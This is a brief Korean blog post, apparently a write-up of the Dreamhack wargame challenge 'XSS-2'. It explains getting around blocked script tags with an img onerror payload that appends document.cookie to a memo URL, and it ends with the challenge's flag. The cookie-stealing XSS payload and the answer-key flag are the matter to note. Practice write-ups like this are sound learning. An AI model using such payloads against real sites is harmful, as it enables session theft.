웹 해킹/Dreamhack Wargame
XSS-2
몽골아덤벼라
2024. 5. 25. 00:28
XSS 취약점을 활용해 FLAG를 획득하는 문제
1. XSS-1과 같은 URL이지만 이번에는 스크립트가 작동하지 않는다
2. 그럼 XSS를 발생시킬 수 있는 <script>태그가 아닌 다른 태그를 사용한다
3. <img src=x onerror=location.href=”/memo?memo=”+document.cookie> 코드 입력
flag=DH{3c01577e9542ec24d68ba0ffb846508f}